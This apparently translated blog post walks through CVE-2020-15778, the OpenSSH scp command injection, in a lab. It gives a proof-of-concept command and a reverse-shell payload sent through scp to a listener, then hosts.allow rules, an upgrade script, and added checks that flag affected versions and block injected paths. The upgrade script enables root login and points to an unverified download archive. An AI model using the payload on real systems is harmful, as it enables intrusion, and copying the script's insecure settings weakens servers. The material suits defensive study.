OpenSSH 8.3 and below: command injection vulnerability, attack and repair
Vulnerability: CVE-2020-15778, discovered on June 9, 2020 and disclosed on July 18, 2020.
Principle of the attack
The remote path handling in scp passes the destination path to the remote shell unquoted, so a command placed inside it (for example between backticks) is executed on the server: command injection.
Vulnerability reproduction requirements
OpenSSH version <= 8.3p1
A valid ssh password for the target
Attack environment
Attacker: Kali, 192.168.0.130
Target machine: CentOS 7, 192.168.0.187
Attack test
Attacker machine:
Upload any file to the target machine; the file may be empty, because the uploaded file is not the point. The command embedded in the remote path is the injection point.
scp dic.txt [email protected]:'`touch /tmp/test.txt` /tmp'
Command interpretation: scp uploads the local file dic.txt to the /tmp folder on the server [email protected]; the backticks enclose the injected command touch /tmp/test.txt, which creates a new file test.txt.
Target machine:
Look at the files in the /tmp directory on the target machine:
[root@localhost tmp]# ls
dic.txt test.txt
This demonstrates remote command execution.
GetShell
Attacker machine:
Use the following commands to obtain a shell on the target machine.
# In one window, start nc listening
nc -lvvp 7777
# In another window, upload the reverse shell command
scp dic.txt [email protected]:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'
Start the listener:
Upload the injection command:
View the listener output:
Commands can now be executed and their output is returned.
Attack summary
The vulnerability is easy to reproduce, but the ssh password must be known. It mainly matters for attacks where the ssh password is known but there is no access/login permission.
Way of defense
Restrict network access
Modify the configuration file /etc/hosts.allow
Use the following format to add ssh access permissions:
sshd:192.168.0.158:allow # allow the host with IP address 192.168.0.158 to connect over ssh
sshd:192.168.0.*:allow #allow hosts in the address range 192.168.0.0/24 to connect over ssh
sshd:all:deny #deny ssh connections from all hosts other than the allowed addresses
This method is mainly used to deny remote ssh logins to the target machine from unexpected addresses and so harden ssh login. It relies on tcp_wrappers (libwrap) support in sshd, which the CentOS 7 package has; an sshd built from upstream source without it does not consult hosts.allow.
Upgrade OpenSSH to version 8.4p1
Run through a shell script:
#!/bin/bash
# Script to update the ssh service
# Download
function download()
{
## Download: copy the commands inside this function to the command line and run them
echo "正在获取安装包..."
echo "获取openssh..."
wget https://openbsd.hk/pub/OpenBSD/OpenSSH/portable/openssh-8.4p1.tar.gz
echo "获取openssl..."
wget https://www.openssl.org/source/openssl-1.1.1g.tar.gz
echo "获取zlib..."
wget http://www.zlib.net/zlib-1.2.11.tar.gz
}
echo "请确保脚本与以下文件在同一文件夹:zlib-1.2.11.tar.gz、openssh-8.4p1.tar.gz、openssl-1.1.1g.tar.gz"
echo "如果没有上述文件,请中断(Ctrl+C)脚本。使用编辑器打开本文件,头部有下载方法"
sleep 1
echo "[========> ] 33%"
sleep 1
echo "[================> ] 66%"
sleep 1
echo "[========================> ] 99%"
sleep 1
# Unpack
echo -e "\033[1;32m 解压安装包 \033[0m"
tar --no-same-owner -zxvf zlib-1.2.11.tar.gz
tar --no-same-owner -zxvf openssh-8.4p1.tar.gz
tar --no-same-owner -zxvf openssl-1.1.1g.tar.gz
# Install zlib
echo -e "\033[1;32m 编译安装 zlib \033[0m"
cd zlib-1.2.11
echo -e "\033[1;32m Now playing : `pwd` \033[0m"
./configure --prefix=/usr/local/zlib
make && make install
sleep 1
# Install openssl
echo ""
echo -e "\033[1;32m 编译安装openssl \033[0m"
cd ../openssl-1.1.1g
echo -e "\033[1;32m Now playing : `pwd` \033[0m"
./config --prefix=/usr/local/ssl --shared
make && make install
echo '/usr/local/ssl/lib' >> /etc/ld.so.conf
ldconfig -v
sleep 1
# Install openssh
echo ""
echo -e "\033[1;32m 编译安装openssh \033[0m"
cd ../openssh-8.4p1
echo -e "\033[1;32m Now playing : `pwd` \033[0m"
./configure --prefix=/usr/local/openssh --with-zlib=/usr/local/zlib --with-ssl-dir=/usr/local/ssl
make && make install
sleep 1
# Modify the configuration file
echo -e "\033[1;32m 修改ssh配置文件 \033[0m"
echo 'PermitRootLogin yes' >>/usr/local/openssh/etc/sshd_config
echo 'PubkeyAuthentication yes' >>/usr/local/openssh/etc/sshd_config
echo 'PasswordAuthentication yes' >>/usr/local/openssh/etc/sshd_config
# Back up the original files and replace the sshd, ssh and ssh-keygen binaries
echo -e "\033[1;32m 备份与修改bin与keygen文件 \033[0m"
systemctl stop sshd
mv /etc/ssh /etc/ssh.bak
mkdir /etc/ssh
cp -rf /usr/local/openssh/etc/* /etc/ssh/
mv /usr/sbin/sshd /usr/sbin/sshd.bak
cp /usr/local/openssh/sbin/sshd /usr/sbin/sshd
mv /usr/bin/ssh /usr/bin/ssh.bak
cp /usr/local/openssh/bin/ssh /usr/bin/ssh
mv /usr/bin/ssh-keygen /usr/bin/ssh-keygen.bak
cp /usr/local/openssh/bin/ssh-keygen /usr/bin/ssh-keygen
# Restart the service (the systemd unit is moved aside and the init script from the source tree is used instead)
echo -e "\033[1;32m 重启服务 \033[0m"
mv /lib/systemd/system/sshd.service .
systemctl daemon-reload
cp ./contrib/redhat/sshd.init /etc/init.d/sshd
/etc/init.d/sshd start
systemctl status sshd
echo -e "\033[1;32m ssh服务更新完成,目前版本"
ssh -V
echo -e "##########\033[0m"
Or download the packaged script and sources directly
Download link: https://pan.baidu.com/s/14aegreBtRdH1BShyohEwXw
Extraction code: c47t
Then run:
tar -zxvf ssh_update.tar.gz
cd ssh_update/
bash ssh-update.sh
After the installation succeeds, check the version:
[root@localhost ssh_update]# ssh -V
OpenSSH_8.4p1, OpenSSL 1.1.1g 21 Apr 2020
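Two defender-side checks that follow from the above, as an added example (not code from the original post): a parser for the "ssh -V" banner that flags versions at or below 8.3p1, and a validator for scp destinations that rejects shell metacharacters before a wrapper script would ever hand them to scp. The function names, the sample banners and the sample destinations are this example's own constructed choices.

```shell
#!/bin/sh
# Added example, not from the original post: two defender-side checks for the
# scp argument injection described above (CVE-2020-15778).
# Function names, the sample banners and the sample destinations are this
# example's own (constructed) choices.

# Parse an "ssh -V" banner and return 0 if the version is at or below 8.3p1
# (the range the post gives as affected), 1 if newer, 2 if it cannot be parsed.
openssh_version_in_affected_range() {
    banner="$1"
    # Keep only "major minor" from the OpenSSH_X.Y token; the pN suffix and the
    # OpenSSL part of the banner are ignored.
    ver=$(printf '%s\n' "$banner" | sed -n 's/.*OpenSSH_\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p')
    [ -n "$ver" ] || return 2
    set -- $ver
    if [ "$1" -lt 8 ] || { [ "$1" -eq 8 ] && [ "$2" -le 3 ]; }; then
        return 0
    fi
    return 1
}

# The remote destination scp sends is expanded by the remote shell, so a wrapper
# that builds scp commands from untrusted input must reject anything outside a
# conservative character set. Allowed: letters, digits, @ : / . _ ~ -
# Rejected: backticks, $, quotes, ; | & < > ( ) and any whitespace.
remote_path_is_safe() {
    dest="$1"
    [ -n "$dest" ] || return 1
    case "$dest" in
        *[!A-Za-z0-9@:/._~-]*) return 1 ;;
    esac
    return 0
}

# Demo: the post's injected destination versus a plain one. The injected form is
# rejected before scp would ever be started.
for dest in 'user@host:/tmp/dic.txt' 'user@host:`touch /tmp/test.txt` /tmp'; do
    if remote_path_is_safe "$dest"; then
        printf 'OK      %s\n' "$dest"
    else
        printf 'REJECT  %s\n' "$dest"
    fi
done
```

The version check only tells you whether a host is inside the range the post gives; the path validator is the control that actually stops the injection pattern in automation that calls scp with externally supplied destinations.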